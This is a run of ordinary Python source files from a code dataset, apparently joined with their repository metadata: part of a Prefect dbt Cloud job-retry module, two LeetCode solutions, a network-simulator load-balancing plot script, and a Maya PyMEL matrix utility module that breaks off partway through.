retry_dbt_cloud_job_run_subset_and_wait_for_completion_flow()\n ```\n \"\"\" # noqa\n if trigger_job_run_options and trigger_job_run_options.steps_override is not None:\n raise ValueError(\n \"Do not set `steps_override` in `trigger_job_run_options` \"\n \"because this flow will automatically set it\"\n )\n\n run_info_future = await get_dbt_cloud_run_info.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n include_related=[\"run_steps\"],\n )\n run_info = await run_info_future.result()\n\n job_id = run_info[\"job_id\"]\n job_info_future = await get_dbt_cloud_job_info.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n )\n job_info = await job_info_future.result()\n\n trigger_job_run_options_override = await _build_trigger_job_run_options(\n dbt_cloud_credentials=dbt_cloud_credentials,\n trigger_job_run_options=trigger_job_run_options,\n run_id=run_id,\n run_info=run_info,\n job_info=job_info,\n )\n\n # to circumvent `RuntimeError: The task runner is already started!`\n flow_run_context = FlowRunContext.get()\n task_runner_type = type(flow_run_context.task_runner)\n\n run_data = await trigger_dbt_cloud_job_run_and_wait_for_completion.with_options(\n task_runner=task_runner_type()\n )(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n retry_filtered_models_attempts=0,\n trigger_job_run_options=trigger_job_run_options_override,\n max_wait_seconds=max_wait_seconds,\n poll_frequency_seconds=poll_frequency_seconds,\n )\n return run_data\n\n\nclass DbtCloudJobRun(JobRun): # NOT A BLOCK\n \"\"\"\n Class that holds the information and methods to interact\n with the resulting run of a dbt Cloud job.\n \"\"\"\n\n def __init__(self, run_id: int, dbt_cloud_job: \"DbtCloudJob\"):\n self.run_id = run_id\n self._dbt_cloud_job = dbt_cloud_job\n self._dbt_cloud_credentials = dbt_cloud_job.dbt_cloud_credentials\n\n @property\n def _log_prefix(self):\n return f\"dbt Cloud job {self._dbt_cloud_job.job_id} run {self.run_id}.\"\n\n async def _wait_until_state(\n self,\n in_final_state_fn: Awaitable[Callable],\n get_state_fn: Awaitable[Callable],\n log_state_fn: Callable = None,\n timeout_seconds: int = 60,\n interval_seconds: int = 1,\n ):\n \"\"\"\n Wait until the job run reaches a specific state.\n\n Args:\n in_final_state_fn: An async function that accepts a run state\n and returns a boolean indicating whether the job run is\n in a final state.\n get_state_fn: An async function that returns\n the current state of the job run.\n log_state_fn: A callable that accepts a run\n state and makes it human readable.\n timeout_seconds: The maximum amount of time, in seconds, to wait\n for the job run to reach the final state.\n interval_seconds: The number of seconds to wait between checks of\n the job run's state.\n \"\"\"\n start_time = time.time()\n last_state = run_state = None\n while not in_final_state_fn(run_state):\n run_state = await get_state_fn()\n if run_state != last_state:\n if self.logger is not None:\n self.logger.info(\n \"%s has new state: %s\",\n self._log_prefix,\n log_state_fn(run_state),\n )\n last_state = run_state\n\n elapsed_time_seconds = time.time() - start_time\n if elapsed_time_seconds > timeout_seconds:\n raise DbtCloudJobRunTimedOut(\n f\"Max wait time of {timeout_seconds} \"\n \"seconds exceeded while waiting\"\n )\n await asyncio.sleep(interval_seconds)\n\n @sync_compatible\n async def get_run(self) -> Dict[str, Any]:\n \"\"\"\n Makes a request to the dbt Cloud API to get the run data.\n\n Returns:\n The run data.\n \"\"\"\n try:\n dbt_cloud_credentials = self._dbt_cloud_credentials\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_run(self.run_id)\n except HTTPStatusError as ex:\n raise DbtCloudGetRunFailed(extract_user_message(ex)) from ex\n run_data = response.json()[\"data\"]\n return run_data\n\n @sync_compatible\n async def get_status_code(self) -> int:\n \"\"\"\n Makes a request to the dbt Cloud API to get the run status.\n\n Returns:\n The run status code.\n \"\"\"\n run_data = await self.get_run()\n run_status_code = run_data.get(\"status\")\n return run_status_code\n\n @sync_compatible\n async def wait_for_completion(self) -> None:\n \"\"\"\n Waits for the job run to reach a terminal state.\n \"\"\"\n await self._wait_until_state(\n in_final_state_fn=DbtCloudJobRunStatus.is_terminal_status_code,\n get_state_fn=self.get_status_code,\n log_state_fn=DbtCloudJobRunStatus,\n timeout_seconds=self._dbt_cloud_job.timeout_seconds,\n interval_seconds=self._dbt_cloud_job.interval_seconds,\n )\n\n @sync_compatible\n async def fetch_result(self, step: Optional[int] = None) -> Dict[str, Any]:\n \"\"\"\n Gets the results from the job run. Since the results\n may not be ready, use wait_for_completion before calling this method.\n\n Args:\n step: The index of the step in the run to query for artifacts. The\n first step in the run has the index 1. If the step parameter is\n omitted, then this method will return the artifacts compiled\n for the last step in the run.\n \"\"\"\n run_data = await self.get_run()\n run_status = DbtCloudJobRunStatus(run_data.get(\"status\"))\n if run_status == DbtCloudJobRunStatus.SUCCESS:\n try:\n async with self._dbt_cloud_credentials.get_administrative_client() as client: # noqa\n response = await client.list_run_artifacts(\n run_id=self.run_id, step=step\n )\n run_data[\"artifact_paths\"] = response.json()[\"data\"]\n self.logger.info(\"%s completed successfully!\", self._log_prefix)\n except HTTPStatusError as ex:\n raise DbtCloudListRunArtifactsFailed(extract_user_message(ex)) from ex\n return run_data\n elif run_status == DbtCloudJobRunStatus.CANCELLED:\n raise DbtCloudJobRunCancelled(f\"{self._log_prefix} was cancelled.\")\n elif run_status == DbtCloudJobRunStatus.FAILED:\n raise DbtCloudJobRunFailed(f\"{self._log_prefix} has failed.\")\n else:\n raise DbtCloudJobRunIncomplete(\n f\"{self._log_prefix} is still running; \"\n \"use wait_for_completion() to wait until results are ready.\"\n )\n\n @sync_compatible\n async def get_run_artifacts(\n self,\n path: Literal[\"manifest.json\", \"catalog.json\", \"run_results.json\"],\n step: Optional[int] = None,\n ) -> Union[Dict[str, Any], str]:\n \"\"\"\n Get an artifact generated for a completed run.\n\n Args:\n path: The relative path to the run artifact.\n step: The index of the step in the run to query for artifacts. The\n first step in the run has the index 1. If the step parameter is\n omitted, then this method will return the artifacts compiled\n for the last step in the run.\n\n Returns:\n The contents of the requested manifest. Returns a `Dict` if the\n requested artifact is a JSON file and a `str` otherwise.\n \"\"\"\n try:\n dbt_cloud_credentials = self._dbt_cloud_credentials\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_run_artifact(\n run_id=self.run_id, path=path, step=step\n )\n except HTTPStatusError as ex:\n raise DbtCloudGetRunArtifactFailed(extract_user_message(ex)) from ex\n\n if path.endswith(\".json\"):\n artifact_contents = response.json()\n else:\n artifact_contents = response.text\n return artifact_contents\n\n def _select_unsuccessful_commands(\n self,\n run_results: List[Dict[str, Any]],\n command_components: List[str],\n command: str,\n exe_command: str,\n ) -> List[str]:\n \"\"\"\n Select nodes that were not successful and rebuild a command.\n \"\"\"\n # note \"fail\" here instead of \"cancelled\" because\n # nodes do not have a cancelled state\n run_nodes = \" \".join(\n run_result[\"unique_id\"].split(\".\")[2]\n for run_result in run_results\n if run_result[\"status\"] in (\"error\", \"skipped\", \"fail\")\n )\n\n select_arg = None\n if \"-s\" in command_components:\n select_arg = \"-s\"\n elif \"--select\" in command_components:\n select_arg = \"--select\"\n\n # prevent duplicate --select/-s statements\n if select_arg is not None:\n # dbt --fail-fast run, -s, bad_mod --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast run -s other_mod bad_mod --vars '{\"env\": \"prod\"}'\n command_start, select_arg, command_end = command.partition(select_arg)\n modified_command = (\n f\"{command_start} {select_arg} {run_nodes} {command_end}\" # noqa\n )\n else:\n # dbt --fail-fast, build, --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast build --select bad_model --vars '{\"env\": \"prod\"}'\n dbt_global_args, exe_command, exe_args = command.partition(exe_command)\n modified_command = (\n f\"{dbt_global_args} {exe_command} -s {run_nodes} {exe_args}\"\n )\n return modified_command\n\n async def _build_trigger_job_run_options(\n self,\n job: Dict[str, Any],\n run: Dict[str, Any],\n ) -> TriggerJobRunOptions:\n \"\"\"\n Compiles a list of steps (commands) to retry, then either build trigger job\n run options from scratch if it does not exist, else overrides the existing.\n \"\"\"\n generate_docs = job.get(\"generate_docs\", False)\n generate_sources = job.get(\"generate_sources\", False)\n\n steps_override = []\n for run_step in run[\"run_steps\"]:\n status = run_step[\"status_humanized\"].lower()\n # Skipping cloning, profile setup, and dbt deps - always the first three\n # steps in any run, and note, index starts at 1 instead of 0\n if run_step[\"index\"] <= 3 or status == \"success\":\n continue\n # get dbt build from \"Invoke dbt with `dbt build`\"\n command = run_step[\"name\"].partition(\"`\")[2].partition(\"`\")[0]\n\n # These steps will be re-run regardless if\n # generate_docs or generate_sources are enabled for a given job\n # so if we don't skip, it'll run twice\n freshness_in_command = (\n \"dbt source snapshot-freshness\" in command\n or \"dbt source freshness\" in command\n )\n if \"dbt docs generate\" in command and generate_docs:\n continue\n elif freshness_in_command and generate_sources:\n continue\n\n # find an executable command like `build` or `run`\n # search in a list so that there aren't false positives, like\n # `\"run\" in \"dbt run-operation\"`, which is True; we actually want\n # `\"run\" in [\"dbt\", \"run-operation\"]` which is False\n command_components = shlex.split(command)\n for exe_command in EXE_COMMANDS:\n if exe_command in command_components:\n break\n else:\n exe_command = \"\"\n\n is_exe_command = exe_command in EXE_COMMANDS\n is_not_success = status in (\"error\", \"skipped\", \"cancelled\")\n is_skipped = status == \"skipped\"\n if (not is_exe_command and is_not_success) or (\n is_exe_command and is_skipped\n ):\n # if no matches like `run-operation`, we will be rerunning entirely\n # or if it's one of the expected commands and is skipped\n steps_override.append(command)\n else:\n # errors and failures are when we need to inspect to figure\n # out the point of failure\n try:\n run_artifact = await self.get_run_artifacts(\n \"run_results.json\", run_step[\"index\"]\n )\n except JSONDecodeError:\n # get the run results scoped to the step which had an error\n # an error here indicates that either:\n # 1) the fail-fast flag was set, in which case\n # the run_results.json file was never created; or\n # 2) there was a problem on dbt Cloud's side saving\n # this artifact\n steps_override.append(command)\n else:\n # we only need to find the individual nodes\n # for those run commands\n run_results = run_artifact[\"results\"]\n modified_command = self._select_unsuccessful_commands(\n run_results=run_results,\n command_components=command_components,\n command=command,\n exe_command=exe_command,\n )\n steps_override.append(modified_command)\n\n if self._dbt_cloud_job.trigger_job_run_options is None:\n trigger_job_run_options_override = TriggerJobRunOptions(\n steps_override=steps_override\n )\n else:\n trigger_job_run_options_override = (\n self._dbt_cloud_job.trigger_job_run_options.copy()\n )\n trigger_job_run_options_override.steps_override = steps_override\n return trigger_job_run_options_override\n\n @sync_compatible\n async def retry_failed_steps(self) -> \"DbtCloudJobRun\": # noqa: F821\n \"\"\"\n Retries steps that did not complete successfully in a run.\n\n Returns:\n A representation of the dbt Cloud job run.\n \"\"\"\n job = await self._dbt_cloud_job.get_job()\n run = await self.get_run()\n\n trigger_job_run_options_override = await self._build_trigger_job_run_options(\n job=job, run=run\n )\n\n num_steps = len(trigger_job_run_options_override.steps_override)\n if num_steps == 0:\n self.logger.info(f\"{self._log_prefix} does not have any steps to retry.\")\n else:\n self.logger.info(f\"{self._log_prefix} has {num_steps} steps to retry.\")\n run = await self._dbt_cloud_job.trigger(\n trigger_job_run_options=trigger_job_run_options_override,\n )\n return run\n\n\nclass DbtCloudJob(JobBlock):\n \"\"\"\n Block that holds the information and methods to interact with a dbt Cloud job.\n\n Attributes:\n dbt_cloud_credentials: The credentials to use to authenticate with dbt Cloud.\n job_id: The id of the dbt Cloud job.\n timeout_seconds: The number of seconds to wait for the job to complete.\n interval_seconds:\n The number of seconds to wait between polling for job completion.\n trigger_job_run_options: The options to use when triggering a job run.\n\n Examples:\n Load a configured dbt Cloud job block.\n ```python\n from prefect_dbt.cloud import DbtCloudJob\n\n dbt_cloud_job = DbtCloudJob.load(\"BLOCK_NAME\")\n ```\n\n Triggers a dbt Cloud job, waits for completion, and fetches the results.\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials, DbtCloudJob\n\n @flow\n def dbt_cloud_job_flow():\n dbt_cloud_credentials = DbtCloudCredentials.load(\"dbt-token\")\n dbt_cloud_job = DbtCloudJob.load(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=154217\n )\n dbt_cloud_job_run = dbt_cloud_job.trigger()\n dbt_cloud_job_run.wait_for_completion()\n dbt_cloud_job_run.fetch_result()\n return dbt_cloud_job_run\n\n dbt_cloud_job_flow()\n ```\n \"\"\"\n\n _block_type_name = \"dbt Cloud Job\"\n _logo_url = \"https://images.ctfassets.net/gm98wzqotmnx/5zE9lxfzBHjw3tnEup4wWL/9a001902ed43a84c6c96d23b24622e19/dbt-bit_tm.png?h=250\" # noqa\n _documentation_url = \"https://prefecthq.github.io/prefect-dbt/cloud/jobs/#prefect_dbt.cloud.jobs.DbtCloudJob\" # noqa\n\n dbt_cloud_credentials: DbtCloudCredentials = Field(\n default=...,\n description=\"The dbt Cloud credentials to use to authenticate with dbt Cloud.\",\n ) # noqa: E501\n job_id: int = Field(\n default=..., description=\"The id of the dbt Cloud job.\", title=\"Job ID\"\n )\n timeout_seconds: int = Field(\n default=900,\n description=\"The number of seconds to wait for the job to complete.\",\n )\n interval_seconds: int = Field(\n default=10,\n description=\"The number of seconds to wait between polling for job completion.\",\n )\n trigger_job_run_options: TriggerJobRunOptions = Field(\n default_factory=TriggerJobRunOptions,\n description=\"The options to use when triggering a job run.\",\n )\n\n @sync_compatible\n async def get_job(self, order_by: Optional[str] = None) -> Dict[str, Any]:\n \"\"\"\n Retrieve information about a dbt Cloud job.\n\n Args:\n order_by: The field to order the results by.\n\n Returns:\n The job data.\n \"\"\"\n try:\n async with self.dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_job(\n job_id=self.job_id,\n order_by=order_by,\n )\n except HTTPStatusError as ex:\n raise DbtCloudGetJobFailed(extract_user_message(ex)) from ex\n return response.json()[\"data\"]\n\n @sync_compatible\n async def trigger(\n self, trigger_job_run_options: Optional[TriggerJobRunOptions] = None\n ) -> DbtCloudJobRun:\n \"\"\"\n Triggers a dbt Cloud job.\n\n Returns:\n A representation of the dbt Cloud job run.\n \"\"\"\n try:\n trigger_job_run_options = (\n trigger_job_run_options or self.trigger_job_run_options\n )\n async with self.dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.trigger_job_run(\n job_id=self.job_id, options=trigger_job_run_options\n )\n except HTTPStatusError as ex:\n raise DbtCloudJobRunTriggerFailed(extract_user_message(ex)) from ex\n\n run_data = response.json()[\"data\"]\n run_id = run_data.get(\"id\")\n run = DbtCloudJobRun(\n dbt_cloud_job=self,\n run_id=run_id,\n )\n self.logger.info(\n f\"dbt Cloud job {self.job_id} run {run_id} successfully triggered. \"\n f\"You can view the status of this run at \"\n f\"https://{self.dbt_cloud_credentials.domain}/#/accounts/\"\n f\"{self.dbt_cloud_credentials.account_id}/projects/\"\n f\"{run_data['project_id']}/runs/{run_id}/\"\n )\n return run\n\n\n@flow\nasync def run_dbt_cloud_job(\n dbt_cloud_job: DbtCloudJob,\n targeted_retries: int = 3,\n) -> Dict[str, Any]:\n \"\"\"\n Flow that triggers and waits for a dbt Cloud job run, retrying a\n subset of failed nodes if necessary.\n\n Args:\n dbt_cloud_job: Block that holds the information and\n methods to interact with a dbt Cloud job.\n targeted_retries: The number of times to retry failed steps.\n\n Examples:\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials, DbtCloudJob\n from prefect_dbt.cloud.jobs import run_dbt_cloud_job\n\n @flow\n def run_dbt_cloud_job_flow():\n dbt_cloud_credentials = DbtCloudCredentials.load(\"dbt-token\")\n dbt_cloud_job = DbtCloudJob(\n dbt_cloud_credentials=dbt_cloud_credentials, job_id=154217\n )\n return run_dbt_cloud_job(dbt_cloud_job=dbt_cloud_job)\n\n run_dbt_cloud_job_flow()\n ```\n \"\"\"\n logger = get_run_logger()\n\n run = await task(dbt_cloud_job.trigger.aio)(dbt_cloud_job)\n while targeted_retries > 0:\n try:\n await task(run.wait_for_completion.aio)(run)\n result = await task(run.fetch_result.aio)(run)\n return result\n except DbtCloudJobRunFailed:\n logger.info(\n f\"Retrying job run with ID: {run.run_id} \"\n f\"{targeted_retries} more times\"\n )\n run = await task(run.retry_failed_steps.aio)(run)\n targeted_retries -= 1\n","repo_name":"PrefectHQ/prefect-dbt","sub_path":"prefect_dbt/cloud/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":43411,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"16"}
+{"seq_id":"22853360377","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:\n if not head: return None\n\n node = ListNode()\n start = node\n current_val = 101\n\n while head:\n if head.val != current_val:\n node.next = head\n node = node.next\n current_val = head.val\n head = head.next\n node.next = None\n\n return start.next\n","repo_name":"jinhongliu6688/leetcode-algorithms","sub_path":"83-remove-duplicates-from-sorted-list/83.py","file_name":"83.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70111962889","text":"from multiprocessing import Pool\nfrom bokeh.plotting import figure, show, output_file\nfrom bokeh.palettes import Category20 as palette\nimport itertools\nimport tqdm\nimport numpy as np\nfrom network_simulator.components import simulator\nfrom network_simulator.helpers import writeSimCache, readSimCache\n\ndef main():\n return simulator(g_init_vars, g_aplist, g_usrlist)\n\ndef loadBalancing(init_vars, aplist, usrlist):\n global g_init_vars, g_aplist, g_usrlist\n\n g_init_vars = init_vars\n g_aplist = aplist\n g_usrlist = usrlist\n \n plot_from_saved = 1\n total_runs = range(20)\n usr_limit = np.arange(30, 120, 5)\n _output = {}\n\n _sim_dict_axes = {\n \"axes1\" : {\n \"param\" : \"No Policy - Epsilon Greedy\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 5,\n \"SMART_PARAM\" : [0.01, 12]\n },\n \"axes2\" : {\n \"param\" : \"Cheapest Users - Epsilon Greedy\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 5,\n \"SMART_PARAM\" : [0.01, 12]\n },\n \"axes3\" : {\n \"param\" : \"No Policy - UCB1\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 6,\n \"SMART_PARAM\" : [0.001, 12]\n },\n \"axes4\" : {\n \"param\" : \"Cheapest Users - UCB1\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 6,\n \"SMART_PARAM\" : [0.001, 12]\n },\n \"axes5\" : {\n \"param\" : \"No Transmission Policy - Shared Evenly\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 1,\n },\n \"axes6\" : {\n \"param\" : \"Cheapest Users - Shared Evenly\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 1,\n },\n \"axes7\" : {\n \"param\" : \"No Transmission Policy - AP Energy Arrival\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 2,\n },\n \"axes8\" : {\n \"param\" : \"Cheapest Users - AP Energy Arrival\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 2,\n },\n \"axes9\" : {\n \"param\" : \"No Transmission Policy - AP Energy Use\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 3,\n },\n \"axes10\" : {\n \"param\" : \"Cheapest Users - AP Energy Use\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 3,\n },\n \"axes11\" : {\n \"param\" : \"No Transmission Policy - AP Energy Efficiency\",\n \"ENERGY_POLICY\" : 0,\n \"SHARE_ENERGY\" : 4,\n },\n \"axes12\" : {\n \"param\" : \"Cheapest Users - AP Energy Efficiency\",\n \"ENERGY_POLICY\" : 2,\n \"SHARE_ENERGY\" : 4,\n }\n }\n\n if plot_from_saved == 0:\n\n bar = tqdm.tqdm(desc=\"Load Balancing\", total=len(_sim_dict_axes.keys()) * len(usr_limit))\n\n init_vars[\"LOAD_BALANCE\"] = 0\n\n # Run once for no Load Balancing\n for axes in _sim_dict_axes.values():\n\n for param in [\"ENERGY_POLICY\", \"SHARE_ENERGY\"]:\n init_vars[param] = axes[param]\n\n if init_vars[\"SHARE_ENERGY\"] == 6 or init_vars[\"SHARE_ENERGY\"] == 5:\n init_vars[\"SMART_PARAM\"] == axes[\"SMART_PARAM\"]\n\n _avg_serviced_users = []\n\n pool = Pool(10)\n\n _serviced_users = [pool.apply_async(main, ()) for run in total_runs]\n\n _avg_serviced_users = sum([result.get() for result in _serviced_users]) / len(total_runs)\n _output[axes[\"param\"] + \" No Balancing\"] = { \"result\" : [_avg_serviced_users]*len(usr_limit) }\n bar.update(1)\n init_vars[\"LOAD_BALANCE\"] = 1\n\n for axes in _sim_dict_axes.values():\n \n for param in [\"ENERGY_POLICY\", \"SHARE_ENERGY\"]:\n init_vars[param] = axes[param]\n\n _avg_serviced_users = []\n\n for num in usr_limit:\n init_vars[\"USR_LIMIT\"] = num\n\n pool = Pool(10)\n\n _serviced_users = [pool.apply_async(main, ()) for run in total_runs]\n\n _avg_serviced_users.append(sum([result.get() for result in _serviced_users]) / len(total_runs))\n\n _output[axes[\"param\"]] = { \"result\" : _avg_serviced_users }\n bar.update(1)\n bar.close()\n writeSimCache(\"LoadBalanceM\", _output)\n else:\n _output = readSimCache(\"LoadBalanceM\")\n\n output_file(\"interactive/loadbalancing.html\")\n\n TOOLTIPS = [\n (\"(x, y)\", \"($x, $y)\"),\n (\"desc\", \"$name\")\n ]\n \n # Plot colours\n colors = itertools.cycle(palette[12])\n\n p = figure(width=1200, height=800, x_axis_label='Total Number of Users', y_axis_label='Total Number of Serviced Users', tooltips=TOOLTIPS, output_backend='svg')\n count = 0\n\n for key, value in _output.items():\n\n count += 1\n\n print(key + \" : \" + str(sum(value[\"result\"])/len(value[\"result\"])))\n if count >= 13:\n p.line(usr_limit, value[\"result\"], legend_label=key, name=key, color=next(colors), line_width=3, line_dash=\"dashed\")\n else:\n p.line(usr_limit, value[\"result\"], legend_label=key, name=key, color=next(colors), line_width=3)\n\n # p.legend[0].orientation = \"vertical\"\n # legend_ref = p.legend[0] \n # p.legend[0] = None\n p.xaxis.axis_label_text_font_size='20px'\n p.xaxis.major_label_text_font_size='20px'\n p.yaxis.axis_label_text_font_size='20px'\n p.yaxis.major_label_text_font_size='20px'\n p.legend.label_text_font_size='18px' \n p.legend[0].orientation = \"vertical\"\n legend_ref = p.legend[0] \n p.add_layout(legend_ref, \"right\")\n\n show(p)\n p.toolbar.logo = None\n p.toolbar_location = None\n\n return p\n","repo_name":"brokenax3/network-simulator-py","sub_path":"network_simulator/test/testLoadBalancing.py","file_name":"testLoadBalancing.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5109407618","text":"# key: memorize the all the stop points\n# time complexity: O(M*N)\n# space complexity: O(M*N)\nimport collections\n\n\nclass Solution(object):\n def hasPath(self, maze, start, destination):\n \"\"\"\n :type maze: List[List[int]]\n :type start: List[int]\n :type destination: List[int]\n :rtype: bool\n \"\"\"\n\n queue = collections.deque([])\n m, n, = len(maze), len(maze[0])\n\n def isWall(pos):\n i, j = pos\n if 0 <= i < m and 0 <= j < n:\n return maze[i][j] == 1\n return True\n\n def bounce(pos):\n i, j = pos\n return list(filter(lambda item: not isWall(item[0]), [[(i-1, j), (-1, 0)], [(i+1, j), (1, 0)], [(i, j-1), (0, -1)], [(i, j+1), (0, 1)]]))\n\n def move(p, d): return (p[0]+d[0], p[1]+d[1])\n visited = {}\n\n queue.extend(bounce(start))\n while queue:\n pos, direct = queue.popleft()\n nxt = move(pos, direct)\n while not isWall(nxt):\n pos = nxt\n nxt = move(nxt, direct)\n\n if tuple(destination) == pos:\n return True\n if visited.get(pos, False):\n continue\n visited[pos] = True\n queue.extend(bounce(pos))\n return False\n","repo_name":"simonzg/leetcode-solutions","sub_path":"490.The_Maze.py","file_name":"490.The_Maze.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2864021672","text":"# -*- coding: utf-8 -*-\n\"\"\"============================================================================\nModule descriptions.\n\n\n__AUTHOR__ = 'minsung'\n__UPDATE__ = 20210707\n\n:Example:\nfrom lib.m_lib import NurbsCurveNode\nreload(NurbsCurveNode)\n\nblah blah blah blah blah blah\nblah blah blah blah blah blah\n============================================================================\"\"\"\n#\n# when start coding 3 empty lines.\n#\nimport math\nfrom pymel import util\nfrom pymel.core import *\nimport maya.OpenMaya as om\nimport pymel.core.datatypes as dt\n\ndef hierarchy_(object_):\n for i,obj in enumerate(object_):\n if i>0:\n parent(obj, object_[i-1])\n\ndef getChildren_(object_, type_=None):\n \"\"\"Get the childrens from top object\n\n Arguments:\n object_ (node): transform node\n type_ (type): node type\n\n Returns:\n list : childrens list\n\n \"\"\"\n object_ = PyNode(object_)\n if not type_:\n type_ = 'transform'\n child_ = object_.listRelatives(ad=1, c=1, typ=type_)\n child_ = child_ + [object_]\n child_.reverse()\n return child_\n\ndef divide_in_two(object_):\n divideNum = int(len(object_)/2)\n items = object_[:divideNum]\n targets = object_[divideNum:]\n return items, targets\n\ndef get_transform(object_):\n _name = object_.name()\n trans = xform(_name, q=1, ws=1, rp=1 )\n rot = xform(_name, q=1, ws=1, ro=1 )\n return trans, rot\n\ndef getTransform(object_):\n return object_.getMatrix(worldSpace=True)\n\ndef set_trans_xform(object_, trans):\n xform(object_, r = 1, t = trans)\n\ndef set_rot_xform(object_, rot):\n xform(object_, r = 1, ro = rot)\n\ndef get_trans(object_):\n return object_.getMatrix(worldSpace=True)[-1][:-1]\n \ndef get_rot(object_):\n return xform(object_, q=1, ws=1, ro=1 )\n\ndef set_transform_(object_):\n items, targets = divide_in_two(object_)\n for i,item in enumerate(items):\n pos, rot = get_transform(item)\n set_trans_xform(targets[i], pos)\n set_rot_xform(targets[i], rot)\n\ndef getInverseTransform(object_):\n \"\"\"Get the object_ from inverse matrix\n\n Arguments:\n object_ (node): transform node\n\n Returns:\n matrix : inverse matrix\n\n \"\"\"\n return object_.getMatrix(worldSpace=True).inverse()\n\ndef getMultMatrix(mat1, mat2):\n \"\"\"Get the matrix from multiply\n\n Arguments:\n mat1 (matrix): The first input Matrix.\n mat2 (matrix): The second input Matrix.\n\n Returns:\n matrix : mult matrix\n\n \"\"\"\n return mat1*mat2\n\ndef matrixList_(matrix_):\n \"\"\"Get the list from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n\n Returns:\n list : matrix array list\n\n \"\"\"\n list_=[]\n array_ = matrix_.get()\n for i,a in enumerate(array_):\n for j in a:\n list_.append(j)\n return list_\n\ndef setMatrixAxis_(matrix_, axis_):\n \"\"\"Get the FlipAxis from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): flip axis\n\n Returns:\n matrix : fliped matrix\n\n \"\"\"\n flipMatrix = dt.Matrix()\n \n if axis_ == 'x':\n matrix_value=[-1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1]\n \n elif axis_ == 'y':\n matrix_value=[1, 0, 0, 0, 0, -1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1]\n \n elif axis_ == 'z':\n matrix_value=[1, 0, 0, 0, 0, 1, 0, 0, 0, 0, -1, 0, 0, 0, 0, 1]\n \n \n if matrix_value:\n om.MScriptUtil.createMatrixFromList(matrix_value, flipMatrix)\n \n return matrix_*flipMatrix\n\ndef setMatrixPos(matrix_, axis_):\n \"\"\"Get the FlipAxis from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): flip axis\n\n Returns:\n matrix : fliped matrix\n\n \"\"\"\n data_=matrixList_(matrix_)\n\n if axis_ == 'x':\n data_[12] *= -1.0\n\n elif axis_ == 'y':\n data_[13] *= -1.0\n\n elif axis_ == 'z':\n data_[14] *= -1.0\n\n om.MScriptUtil.createMatrixFromList(data_, matrix_)\n\n return matrix_\n \ndef setMatrixRot_(matrix_, axis_):\n \"\"\"Get the FlipRotate from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): flip axis\n\n Returns:\n matrix : fliped matrix\n\n \"\"\"\n data_ = matrixList_(matrix_)\n if axis_ == 'x':\n data_[0] *= -1.0\n data_[1] *= -1.0\n data_[2] *= -1.0\n\n elif axis_ == 'y':\n data_[4] *= -1.0\n data_[5] *= -1.0\n data_[6] *= -1.0\n\n elif axis_ == 'z':\n data_[8] *= -1.0\n data_[9] *= -1.0\n data_[10] *= -1.0\n\n om.MScriptUtil.createMatrixFromList(data_, matrix_)\n\n return matrix_\n\ndef setMatrixFromList(list_):\n\n matrix_ = dt.Matrix()\n data_ = matrixList_(matrix_)\n data_[0] = list_[0]\n data_[1] = list_[1]\n data_[2] = list_[2]\n data_[4] = list_[3]\n data_[5] = list_[4]\n data_[6] = list_[5]\n data_[8] = list_[6]\n data_[9] = list_[7]\n data_[10] = list_[8]\n data_[12] = list_[9]\n data_[13] = list_[10]\n data_[14] = list_[11]\n\n om.MScriptUtil.createMatrixFromList(data_, matrix_)\n\n return matrix_\n\ndef mirrorMatrix_(matrix_, axis_=None, type_=None):\n \"\"\"Get the mirror matrix from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): 'x', 'y', 'z'\n type_ (mirror type): 'flip', 'rot', 'pos'\n\n Returns:\n matrix : mirror matrix\n\n \"\"\"\n if type_ == 'flip':\n getMatrix_ = setMatrixAxis_(matrix_, axis_)\n if type_ == 'rot':\n getMatrix_ = setMatrixRot_(matrix_, axis_)\n if type_ == 'pos':\n getMatrix_ = setMatrixPos(matrix_, axis_)\n return getMatrix_\n\n\ndef mirror_(items, targets, 